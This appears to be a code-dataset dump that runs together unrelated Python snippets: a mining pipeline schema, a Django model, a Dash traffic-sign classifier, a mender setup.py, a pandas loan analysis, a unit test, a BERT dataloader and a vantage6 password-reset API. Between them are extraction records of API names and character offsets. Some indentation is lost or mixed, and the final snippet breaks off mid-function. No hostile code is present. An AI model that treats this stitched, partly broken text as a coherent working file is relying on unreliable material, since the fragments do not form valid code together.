PIPELINE_SCHEMA = {
PipelineLayer.COMMON: {
"type": PipelineType.COMMON,
"dico": ["location", "opex", "unit", "currency", "output", "names", "products"]
},
PipelineLayer.MINE: {
"type": PipelineType.PRODUCER,
"dico": ["mine.name", "mine.extraction", "mine.quality", "mine.capex"],
"options": "mining_options",
"production": "mining_specific_production",
"opex": "mining_opex___specific_consumptions",
"capex": "mining_capex",
"priority_mines": "prioritymines"
},
PipelineLayer.BENEFICIATION: {
"type": PipelineType.PRODUCER,
"dico": ["beneficiation.name", "beneficitation.process", "beneficitation.quality", "beneficitation.capex"],
"options": "beneficiation_options",
"production": "beneficiation_production",
"opex": "beneficiation_opex___specific_consumptions",
"capex": "beneficiation_capex"
},
PipelineLayer.SAP: {
"type": PipelineType.PRODUCER,
"dico": ["sap.name", "sap.process", "sap.product", "sap.capex", "sap.capacity[kt]"],
"options": "sap___power_plant_options",
"production": "sap___power_plant_production",
"opex": "sap___power_plant_opex___specific_consumptions",
"capex": "sap___power_plant_capex",
"product_type": "sap.product"
},
PipelineLayer.PAP: {
"type": PipelineType.PRODUCER,
"dico": ["pap.name", "pap.process", "pap.product", "pap.capex", "pap.size[kt]", "pap.input"],
"options": "pap_options",
"production": "pap_production",
"opex": "pap_opex___specific_consumptions",
"capex": "pap_capex",
"product_type": "pap.product"
},
PipelineLayer.GRANULATION: {
"type": PipelineType.PRODUCER,
"dico": ["granulation.name", "granulation.process", "granulation.product", "granulation.capex", "granulation.input"],
"options": "granulation_options",
"production": "granulation_production",
"opex": "granulation_opex",
"capex": "granulation_capex"
},
PipelineLayer.LOGISTICS: {
"type": PipelineType.TRANSPORT,
"dico": ["logistics.name", "logistics.process", "logistics.product", "logistics.capex"],
"options": "logistics_options",
"production": None,
"opex": "logistics_opex",
"capex": "logistics_capex"
},
PipelineLayer.RAW_MATERIALS: {
"type": PipelineType.PRICE,
"data": "raw_materials"
},
PipelineLayer.SALES_PLAN: {
"type": PipelineType.SALES,
"data": "sales_plan"
},
PipelineLayer.UNIT_CONVERSION_MATRIX: {
"type": PipelineType.COMMON,
"data": "conv_matrix"
},
}
SUPPLY_CHAIN = "mine2port"
DEPARTURE_ARRIVAL = {SUPPLY_CHAIN: (PipelineLayer.MINE),
"sap2pap": (PipelineLayer.SAP, PipelineLayer.PAP)}
COMBO_NODES = {
PipelineLayer.MINE_BENEFICIATION: {
"url": "mining_wp_connections",
"upstream_layer": PipelineLayer.MINE,
"downstream_layer": PipelineLayer.BENEFICIATION
}
}
COMBO_NODES_SEPARATION = "--"
class FunctionType(Enum):
COST_PV = 0
CASH_COST = 1
FULL_COST = 2
class ScenarioGeneratorType(IntEnum):
FROM_PATHS = 0
FROM_OPTIONS = 1
SPECIFIC_SCENARIOS = 2
SCENARIO_GEN_TYPE = ScenarioGeneratorType.FROM_OPTIONS
PIPELINE_METADATA = {
PipelineLayer.MINE: {
"type": PipelineType.PRODUCER,
"production": ["Name", "Extraction", "Quality", "Unit"],
"opex": ["Name", "Extraction", "Capacity", "Item", "Unit"],
"capex": ["Name", "Extraction", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.BENEFICIATION: {
"type": PipelineType.PRODUCER,
"production": ["Process", "InputQuality", "OutputQuality", "Humidity", "Unit"],
"opex": ["Process", "InputQuality", "OutputQuality", "Item", "Unit"],
"capex": ["Name", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.SAP: {
"type": PipelineType.PRODUCER,
"production": ["Location", "Process", "Product", "Unit"],
"opex": ["Location", "Process", "Item", "Unit"],
"capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.PAP: {
"type": PipelineType.PRODUCER,
"production": ["Process", "Input", "Product", "Unit"],
"opex": ["Location", "Process", "Capacity", "Input", "Item", "Product", "Unit"],
"capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.GRANULATION: {
"type": PipelineType.PRODUCER,
"production": ["Process", "Input", "Product", "Unit"],
"opex": ["Location", "ProductionSite", "Process", "Capacity", "Product", "Item", "Unit"],
"capex": ["Location", "ProductionSite", "Product", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.LOGISTICS: {
"type": PipelineType.TRANSPORT,
"opex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit"],
"capex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.RAW_MATERIALS: {
"type": PipelineType.PRICE,
"columns": ["Item", "Unit"]
},
PipelineLayer.SALES_PLAN: {
"type": PipelineType.PRICE,
"columns": ["Type", "Product", "Unit"]
},
PipelineLayer.UNIT_CONVERSION_MATRIX: {
"type": PipelineType.COMMON,
"columns": ["Initial Unit", "Uniform Unit", "Conversion Rate"]
},
}
class ShuffleLevel(IntEnum):
UNDEFINED = 0
SHUFFLE_WITHOUT_PERM = 1
SHUFFLE_WITH_PERMUTATIONS = 2
SHUFFLE_WITH_PERMUTATIONS_WITH_FILTERS = 3
SHUFFLE_WITH_UNNAMED = 4
SHUFFLE_LEVELS = {
PipelineLayer.MINE: ShuffleLevel.UNDEFINED,
PipelineLayer.BENEFICIATION: ShuffleLevel.UNDEFINED,
PipelineLayer.SAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,
PipelineLayer.PAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,
PipelineLayer.GRANULATION: ShuffleLevel.UNDEFINED,
PipelineLayer.LOGISTICS: ShuffleLevel.UNDEFINED,
PipelineLayer.MINE_BENEFICIATION: ShuffleLevel.UNDEFINED
} | [
"os.getenv"
] | [((195, 253), 'os.getenv', 'os.getenv', (['"""JESA_MINE2FARM_HOME"""', '"""C:/GitRepos/mine2farm/"""'], {}), "('JESA_MINE2FARM_HOME', 'C:/GitRepos/mine2farm/')\n", (204, 253), False, 'import os\n')] |
from django.db import models
# Create your models here.
class Destination(models.Model):
    name = models.CharField(max_length=100)
    img = models.ImageField(upload_to='pics')
desc = models.TextField()
price = models.IntegerField()
    offer = models.BooleanField(default=False)
class News:
    id: int
    img: str
    date: int
    month: str
    headline: str
    category: str
    desc: str
"django.db.models.TextField",
"django.db.models.IntegerField",
"django.db.models.BooleanField",
"django.db.models.ImageField",
"django.db.models.CharField"
] | [((103, 135), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (119, 135), False, 'from django.db import models\n'), ((148, 183), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""pics"""'}), "(upload_to='pics')\n", (165, 183), False, 'from django.db import models\n'), ((197, 215), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (213, 215), False, 'from django.db import models\n'), ((228, 249), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (247, 249), False, 'from django.db import models\n'), ((262, 296), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (281, 296), False, 'from django.db import models\n')] |
import base64
import io
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
from dash.dependencies import Input, Output
import numpy as np
import tensorflow as tf
from PIL import Image
from constants import CLASSES
import yaml
with open('app.yaml') as yaml_data:
params = yaml.safe_load(yaml_data)
IMAGE_WIDTH = params['IMAGE_WIDTH']
IMAGE_HEIGHT = params['IMAGE_HEIGHT']
PATH_MODEL = params['PATH_MODEL']
# Load DNN model
classifier = tf.keras.models.load_model(PATH_MODEL)
def classify_image(image, model, image_box=None):
"""Classify image by model
Parameters
----------
content: image content
model: tf/keras classifier
Returns
-------
class id returned by model classifier
"""
images_list = []
image = image.resize((IMAGE_WIDTH, IMAGE_HEIGHT), box=image_box)
# box argument clips image to (x1, y1, x2, y2)
image = np.array(image)
images_list.append(image)
return model.predict_classes(np.array(images_list))
app = dash.Dash('Traffic Signs Recognition', external_stylesheets=[dbc.themes.BOOTSTRAP])
pre_style = {
'whiteSpace': 'pre-wrap',
'wordBreak': 'break-all',
'whiteSpace': 'normal'
}
# Define application layout
navbar = dbc.NavbarSimple(
children=[
dbc.DropdownMenu(
children=[
dbc.DropdownMenuItem('Réseau de Neurones', header=True),
dbc.DropdownMenuItem('SVM', href="#"),
],
nav=True,
in_navbar=True,
label='Modèle',
),
],
brand="Menu",
brand_href="#",
color= "#d90054",
dark=True
)
cards = html.Div(
[
dbc.Card(
dbc.CardBody(
[
html.H5("Présentation", className="card-title"),
html.P(
[
'Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.',
],
className='card-text',
),
]
),
className='w-75 mb-3',
color='#f1cbd1',
outline='Black',
style={
'margin-top': '75px',
'margin-left': '185px'},
),
]
)
app.layout = html.Div([
html.Div([navbar]),
html.Div(cards),
dcc.Upload(
id='bouton-chargement',
children=html.Div([
'Cliquer-déposer ou ',
html.A('sélectionner une image')
]),
style={
'width': '50%',
'height': '60px',
'lineHeight': '60px',
'borderWidth': '1px',
'borderStyle': 'dashed',
'borderRadius': '5px',
'textAlign': 'center',
'margin-top': '75px',
'margin-left': '370px',
}
),
html.Div(id='mon-image'),
html.Div(id='ma-zone-resultat')
])
@app.callback(Output('mon-image', 'children'),
[Input('bouton-chargement', 'contents')])
def update_output(contents):
if contents is not None:
content_type, content_string = contents.split(',')
if 'image' in content_type:
image = Image.open(io.BytesIO(base64.b64decode(content_string)))
predicted_class = classify_image(image, classifier)[0]
return html.Div([
html.Hr(style={'margin-top': '75px'}),
html.Img(src=contents, style={'margin-left': '750px'}),
html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),
html.Hr(),
#html.Div('Raw Content'),
#html.Pre(contents, style=pre_style)
])
else:
try:
                # Decode the image transmitted as base 64 (case of ppm files)
                # base 64 file --> PIL image
image = Image.open(io.BytesIO(base64.b64decode(content_string)))
                # PIL image --> PNG conversion --> in-memory buffer
buffer = io.BytesIO()
image.save(buffer, format='PNG')
                # in-memory buffer --> base 64 image
buffer.seek(0)
img_bytes = buffer.read()
content_string = base64.b64encode(img_bytes).decode('ascii')
                # Call the classification model
predicted_class = classify_image(image, classifier)[0]
                # Display the image
return html.Div([
html.Hr(style={'margin-top': '75px'}),
html.Img(src='data:image/png;base64,' + content_string, style={'margin-left': '750px'}),
html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}),
html.Hr(),
])
except:
return html.Div([
html.Hr(),
html.Div('Uniquement des images svp : {}'.format(content_type)),
html.Hr(),
html.Div('Raw Content'),
html.Pre(contents, style=pre_style)
])
# Manage interactions with callbacks
@app.callback(
Output(component_id='ma-zone-resultat', component_property='children'),
[Input(component_id='mon-champ-texte', component_property='value')]
)
def update_output_div(input_value):
return html.H3('Valeur saisie ici "{}"'.format(input_value))
# Start the application
if __name__ == '__main__':
app.run_server(debug=True) | [
"dash_bootstrap_components.DropdownMenuItem",
"dash.dependencies.Output",
"base64.b64encode",
"io.BytesIO",
"dash_html_components.H5",
"base64.b64decode",
"dash.dependencies.Input",
"dash_html_components.Pre",
"yaml.safe_load",
"numpy.array",
"dash_html_components.Div",
"tensorflow.keras.models.load_model",
"dash_html_components.Img",
"dash_html_components.Hr",
"dash_html_components.P",
"dash.Dash",
"dash_html_components.A"
] | [((524, 562), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', (['PATH_MODEL'], {}), '(PATH_MODEL)\n', (550, 562), True, 'import tensorflow as tf\n'), ((1083, 1171), 'dash.Dash', 'dash.Dash', (['"""Traffic Signs Recognition"""'], {'external_stylesheets': '[dbc.themes.BOOTSTRAP]'}), "('Traffic Signs Recognition', external_stylesheets=[dbc.themes.\n BOOTSTRAP])\n", (1092, 1171), False, 'import dash\n'), ((353, 378), 'yaml.safe_load', 'yaml.safe_load', (['yaml_data'], {}), '(yaml_data)\n', (367, 378), False, 'import yaml\n'), ((974, 989), 'numpy.array', 'np.array', (['image'], {}), '(image)\n', (982, 989), True, 'import numpy as np\n'), ((3345, 3376), 'dash.dependencies.Output', 'Output', (['"""mon-image"""', '"""children"""'], {}), "('mon-image', 'children')\n", (3351, 3376), False, 'from dash.dependencies import Input, Output\n'), ((5671, 5741), 'dash.dependencies.Output', 'Output', ([], {'component_id': '"""ma-zone-resultat"""', 'component_property': '"""children"""'}), "(component_id='ma-zone-resultat', component_property='children')\n", (5677, 5741), False, 'from dash.dependencies import Input, Output\n'), ((1052, 1073), 'numpy.array', 'np.array', (['images_list'], {}), '(images_list)\n', (1060, 1073), True, 'import numpy as np\n'), ((2702, 2720), 'dash_html_components.Div', 'html.Div', (['[navbar]'], {}), '([navbar])\n', (2710, 2720), True, 'import dash_html_components as html\n'), ((2731, 2746), 'dash_html_components.Div', 'html.Div', (['cards'], {}), '(cards)\n', (2739, 2746), True, 'import dash_html_components as html\n'), ((3265, 3289), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""mon-image"""'}), "(id='mon-image')\n", (3273, 3289), True, 'import dash_html_components as html\n'), ((3295, 3326), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""ma-zone-resultat"""'}), "(id='ma-zone-resultat')\n", (3303, 3326), True, 'import dash_html_components as html\n'), ((3393, 3431), 'dash.dependencies.Input', 'Input', (['"""bouton-chargement"""', '"""contents"""'], {}), "('bouton-chargement', 'contents')\n", (3398, 3431), False, 'from dash.dependencies import Input, Output\n'), ((5748, 5813), 'dash.dependencies.Input', 'Input', ([], {'component_id': '"""mon-champ-texte"""', 'component_property': '"""value"""'}), "(component_id='mon-champ-texte', component_property='value')\n", (5753, 5813), False, 'from dash.dependencies import Input, Output\n'), ((4471, 4483), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (4481, 4483), False, 'import io\n'), ((1819, 1866), 'dash_html_components.H5', 'html.H5', (['"""Présentation"""'], {'className': '"""card-title"""'}), "('Présentation', className='card-title')\n", (1826, 1866), True, 'import dash_html_components as html\n'), ((1888, 2301), 'dash_html_components.P', 'html.P', (['["Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester."\n ]'], {'className': '"""card-text"""'}), '([\n "Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. 
En haut à droite vous pouvez sélectionner le modèle que vous voulez tester."\n ], className=\'card-text\')\n', (1894, 2301), True, 'import dash_html_components as html\n'), ((3629, 3661), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\n', (3645, 3661), False, 'import base64\n'), ((3777, 3814), 'dash_html_components.Hr', 'html.Hr', ([], {'style': "{'margin-top': '75px'}"}), "(style={'margin-top': '75px'})\n", (3784, 3814), True, 'import dash_html_components as html\n'), ((3832, 3886), 'dash_html_components.Img', 'html.Img', ([], {'src': 'contents', 'style': "{'margin-left': '750px'}"}), "(src=contents, style={'margin-left': '750px'})\n", (3840, 3886), True, 'import dash_html_components as html\n'), ((4016, 4025), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (4023, 4025), True, 'import dash_html_components as html\n'), ((1411, 1466), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['"""Réseau de Neurones"""'], {'header': '(True)'}), "('Réseau de Neurones', header=True)\n", (1431, 1466), True, 'import dash_bootstrap_components as dbc\n'), ((1484, 1521), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['"""SVM"""'], {'href': '"""#"""'}), "('SVM', href='#')\n", (1504, 1521), True, 'import dash_bootstrap_components as dbc\n'), ((2879, 2911), 'dash_html_components.A', 'html.A', (['"""sélectionner une image"""'], {}), "('sélectionner une image')\n", (2885, 2911), True, 'import dash_html_components as html\n'), ((4344, 4376), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\n', (4360, 4376), False, 'import base64\n'), ((4690, 4717), 'base64.b64encode', 'base64.b64encode', (['img_bytes'], {}), '(img_bytes)\n', (4706, 4717), False, 'import base64\n'), ((4950, 4987), 'dash_html_components.Hr', 'html.Hr', ([], {'style': "{'margin-top': '75px'}"}), "(style={'margin-top': '75px'})\n", (4957, 4987), True, 'import dash_html_components as html\n'), ((5009, 5101), 'dash_html_components.Img', 'html.Img', ([], {'src': "('data:image/png;base64,' + content_string)", 'style': "{'margin-left': '750px'}"}), "(src='data:image/png;base64,' + content_string, style={\n 'margin-left': '750px'})\n", (5017, 5101), True, 'import dash_html_components as html\n'), ((5234, 5243), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5241, 5243), True, 'import dash_html_components as html\n'), ((5338, 5347), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5345, 5347), True, 'import dash_html_components as html\n'), ((5454, 5463), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5461, 5463), True, 'import dash_html_components as html\n'), ((5501, 5524), 'dash_html_components.Div', 'html.Div', (['"""Raw Content"""'], {}), "('Raw Content')\n", (5509, 5524), True, 'import dash_html_components as html\n'), ((5546, 5581), 'dash_html_components.Pre', 'html.Pre', (['contents'], {'style': 'pre_style'}), '(contents, style=pre_style)\n', (5554, 5581), True, 'import dash_html_components as html\n')] |
# Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import setuptools
import re
VERSIONFILE = "src/mender/_version.py"
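# Read __version__ from the version file with a regex instead of importing the package.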
version_string_line = open(VERSIONFILE, "rt").read()
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
match = re.search(VSRE, version_string_line, re.M)
if match:
version_string = match.group(1)
else:
raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="mender-python-client-mendersoftware",
version=version_string,
license="Apache 2.0",
author="Mendersoftware",
author_email="<EMAIL>",
description="A Python implementation of the Mender client interface",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/mendersoftware/mender-python-client",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
keywords=["mender", "OTA", "updater"],
packages=setuptools.find_packages(where="src"),
install_requires=["cryptography", "requests", "msgpack", "websockets"],
entry_points={"console_scripts": ["mender-python-client=mender.mender:main"]},
package_dir={"": "src"},
python_requires=">=3.6",
zip_safe=False,
include_package_data=True,
)
| [
"setuptools.find_packages",
"re.search"
] | [((781, 823), 're.search', 're.search', (['VSRE', 'version_string_line', 're.M'], {}), '(VSRE, version_string_line, re.M)\n', (790, 823), False, 'import re\n'), ((1687, 1724), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'where': '"""src"""'}), "(where='src')\n", (1711, 1724), False, 'import setuptools\n')] |
# --------------
# Importing header files
import numpy as np
import pandas as pd
from scipy.stats import mode
# code starts here
bank = pd.read_csv(path)
categorical_var = bank.select_dtypes(include = 'object')
print(categorical_var)
numerical_var = bank.select_dtypes(include = 'number')
print(numerical_var)
banks = bank.drop(columns=['Loan_ID'])
bank_mode = banks.mode()
banks = banks.fillna(bank_mode.iloc[0])
print(banks.isnull().sum())
avg_loan_amount = pd.pivot_table(banks, index=['Gender', 'Married', 'Self_Employed'], values='LoanAmount', aggfunc = 'mean')
print(avg_loan_amount)
loan_approved_se = banks[ (banks['Self_Employed'] == "Yes") & (banks['Loan_Status'] == "Y") ]
loan_approved_nse = banks[ (banks['Self_Employed'] == "No") & (banks['Loan_Status'] == "Y") ]
percentage_se = (len(loan_approved_se) / 614) * 100
percentage_nse = (len(loan_approved_nse) / 614) * 100
# loan amount term
loan_term = banks['Loan_Amount_Term'].apply(lambda x: int(x)/12 )
big_loan_term=len(loan_term[loan_term>=25])
print(big_loan_term)
columns_to_show = ['ApplicantIncome', 'Credit_History']
loan_groupby=banks.groupby(['Loan_Status'])[columns_to_show]
# Check the mean value
mean_values=loan_groupby.agg([np.mean])
print(mean_values)
# code ends here
| [
"pandas.pivot_table",
"pandas.read_csv"
] | [((150, 167), 'pandas.read_csv', 'pd.read_csv', (['path'], {}), '(path)\n', (161, 167), True, 'import pandas as pd\n'), ((489, 598), 'pandas.pivot_table', 'pd.pivot_table', (['banks'], {'index': "['Gender', 'Married', 'Self_Employed']", 'values': '"""LoanAmount"""', 'aggfunc': '"""mean"""'}), "(banks, index=['Gender', 'Married', 'Self_Employed'], values=\n 'LoanAmount', aggfunc='mean')\n", (503, 598), True, 'import pandas as pd\n')] |
from unittest import TestCase
from unittest.mock import patch
from easy2fa import cli
class TestCheckInput(TestCase):
@patch('builtins.input')
def test_default(self, mock_input):
mock_input.return_value = ''
self.assertEquals(cli.check_input('prompt', default='one'), 'one')
mock_input.return_value = 'two'
self.assertEquals(cli.check_input('prompt', default='one'), 'two')
@patch('builtins.input')
@patch('builtins.print')
def test_assertions(self, mock_print, mock_input):
def assertion(value):
if value not in ['yes', 'no']:
return 'use yes or no'
mock_input.side_effect = ['input', '', 'no']
self.assertEquals(cli.check_input('prompt', assertion=assertion),
'no')
mock_print.assert_called_with('\tInvalid input: use yes or no')
| [
"easy2fa.cli.check_input",
"unittest.mock.patch"
] | [((126, 149), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {}), "('builtins.input')\n", (131, 149), False, 'from unittest.mock import patch\n'), ((423, 446), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {}), "('builtins.input')\n", (428, 446), False, 'from unittest.mock import patch\n'), ((452, 475), 'unittest.mock.patch', 'patch', (['"""builtins.print"""'], {}), "('builtins.print')\n", (457, 475), False, 'from unittest.mock import patch\n'), ((253, 293), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'default': '"""one"""'}), "('prompt', default='one')\n", (268, 293), False, 'from easy2fa import cli\n'), ((368, 408), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'default': '"""one"""'}), "('prompt', default='one')\n", (383, 408), False, 'from easy2fa import cli\n'), ((723, 769), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'assertion': 'assertion'}), "('prompt', assertion=assertion)\n", (738, 769), False, 'from easy2fa import cli\n')] |
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from bert_finetuning.data import GermanData
class GermanDataLoader:
def __init__(
self,
data_paths,
model_name,
do_cleansing,
max_sequence_length,
batch_size=8,
dataset_cls=GermanData,
):
self.german_data = dataset_cls(
data_paths,
model_name,
max_sequence_length=max_sequence_length,
do_cleansing=do_cleansing,
)
self.batch_size = batch_size
self.create_loaders()
def create_loaders(self):
"""
Create Torch dataloaders for data splits
"""
self.german_data.text_to_tensors()
print("creating dataloaders")
train_data = TensorDataset(
self.german_data.train_inputs,
self.german_data.train_masks,
self.german_data.train_labels,
)
train_sampler = RandomSampler(train_data)
self.train_dataloader = DataLoader(
train_data, sampler=train_sampler, batch_size=self.batch_size
)
validation_data = TensorDataset(
self.german_data.validation_inputs,
self.german_data.validation_masks,
self.german_data.validation_labels,
)
validation_sampler = SequentialSampler(validation_data)
self.validation_dataloader = DataLoader(
validation_data, sampler=validation_sampler, batch_size=self.batch_size
)
test_data = TensorDataset(
self.german_data.test_inputs,
self.german_data.test_masks,
self.german_data.test_labels,
)
test_sampler = SequentialSampler(test_data)
self.test_dataloader = DataLoader(
test_data, sampler=test_sampler, batch_size=self.batch_size
)
print("finished creating dataloaders")
"""
** FOR DEBUGGING **
if __name__ == "__main__":
## define data paths
germeval_data_paths = {
"train": "./datasets/hasoc_dataset/hasoc_german_train.csv",
"dev": "./datasets/hasoc_dataset/hasoc_german_validation.csv",
"test": "./datasets/hasoc_dataset/hasoc_german_test.csv",
}
hasoc_german_data_paths = {
"train": "./datasets/hasoc_dataset/hasoc_german_train.csv",
"dev": "./datasets/hasoc_dataset/hasoc_german_validation.csv",
"test": "./datasets/hasoc_dataset/hasoc_german_test.csv",
}
## create dataloaders
print("creating germeval dataloaders...")
germ_eval_dataloader = GermanDataLoader(germeval_data_paths)
print("creating hasoc dataloaders...")
hasoc_german_dataloader = GermanDataLoader(hasoc_german_data_paths)
"""
| [
"torch.utils.data.RandomSampler",
"torch.utils.data.SequentialSampler",
"torch.utils.data.TensorDataset",
"torch.utils.data.DataLoader"
] | [((837, 946), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.train_inputs', 'self.german_data.train_masks', 'self.german_data.train_labels'], {}), '(self.german_data.train_inputs, self.german_data.train_masks,\n self.german_data.train_labels)\n', (850, 946), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1019, 1044), 'torch.utils.data.RandomSampler', 'RandomSampler', (['train_data'], {}), '(train_data)\n', (1032, 1044), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1078, 1151), 'torch.utils.data.DataLoader', 'DataLoader', (['train_data'], {'sampler': 'train_sampler', 'batch_size': 'self.batch_size'}), '(train_data, sampler=train_sampler, batch_size=self.batch_size)\n', (1088, 1151), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1205, 1330), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.validation_inputs', 'self.german_data.validation_masks', 'self.german_data.validation_labels'], {}), '(self.german_data.validation_inputs, self.german_data.\n validation_masks, self.german_data.validation_labels)\n', (1218, 1330), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1407, 1441), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['validation_data'], {}), '(validation_data)\n', (1424, 1441), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1480, 1568), 'torch.utils.data.DataLoader', 'DataLoader', (['validation_data'], {'sampler': 'validation_sampler', 'batch_size': 'self.batch_size'}), '(validation_data, sampler=validation_sampler, batch_size=self.\n batch_size)\n', (1490, 1568), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1611, 1717), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.test_inputs', 'self.german_data.test_masks', 'self.german_data.test_labels'], {}), '(self.german_data.test_inputs, self.german_data.test_masks,\n self.german_data.test_labels)\n', (1624, 1717), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1789, 1817), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['test_data'], {}), '(test_data)\n', (1806, 1817), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1850, 1921), 'torch.utils.data.DataLoader', 'DataLoader', (['test_data'], {'sampler': 'test_sampler', 'batch_size': 'self.batch_size'}), '(test_data, sampler=test_sampler, batch_size=self.batch_size)\n', (1860, 1921), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n')] |
# -*- coding: utf-8 -*-
import logging
import datetime
from flask import request, render_template
from flask_jwt_extended import (
create_access_token,
decode_token
)
from jwt.exceptions import DecodeError
from flasgger import swag_from
from http import HTTPStatus
from pathlib import Path
from sqlalchemy.orm.exc import NoResultFound
from vantage6.common import logger_name
from vantage6.server import db
from vantage6.server.resource import (
ServicesResources
)
module_name = logger_name(__name__)
log = logging.getLogger(module_name)
def setup(api, api_base, services):
path = "/".join([api_base, module_name])
log.info(f'Setting up "{path}" and subdirectories')
api.add_resource(
ResetPassword,
path+'/reset',
endpoint="reset_password",
methods=('POST',),
resource_class_kwargs=services
)
api.add_resource(
RecoverPassword,
path+'/lost',
endpoint='recover_password',
methods=('POST',),
resource_class_kwargs=services
)
# ------------------------------------------------------------------------------
# Resources / API's
# ------------------------------------------------------------------------------
class ResetPassword(ServicesResources):
"""user can use recover token to reset their password."""
@swag_from(str(Path(r"swagger/post_reset_password.yaml")),
endpoint='reset_password')
    def post(self):
        """Reset the password using the recovery token and the new password."""
# retrieve user based on email or username
body = request.get_json()
reset_token = body.get("reset_token")
password = body.get("password")
if not reset_token or not password:
return {"msg": "reset token and/or password is missing!"}, \
HTTPStatus.BAD_REQUEST
# obtain user
try:
user_id = decode_token(reset_token)['identity'].get('id')
except DecodeError:
return {"msg": "Invalid recovery token!"}, HTTPStatus.BAD_REQUEST
log.debug(user_id)
user = db.User.get(user_id)
# set password
user.set_password(password)
user.save()
        log.info(f"Successful password reset for '{user.username}'")
        return {"msg": "password has successfully been reset!"}, \
HTTPStatus.OK
class RecoverPassword(ServicesResources):
"""send a mail containing a recover token"""
@swag_from(str(Path(r"swagger/post_recover_password.yaml")),
endpoint='recover_password')
def post(self):
"""username or email generates a token which is mailed."""
# default return string
        ret = {"msg": "If the username or email is in our database you "
"will soon receive an email"}
        # obtain username/email from request
body = request.get_json()
username = body.get("username")
email = body.get("email")
if not (email or username):
return {"msg": "No username or email provided!"}, \
HTTPStatus.BAD_REQUEST
# find user in the database, if not here we stop!
try:
if username:
user = db.User.get_by_username(username)
else:
user = db.User.get_by_email(email)
except NoResultFound:
# we do not tell them.... But we won't continue either
return ret
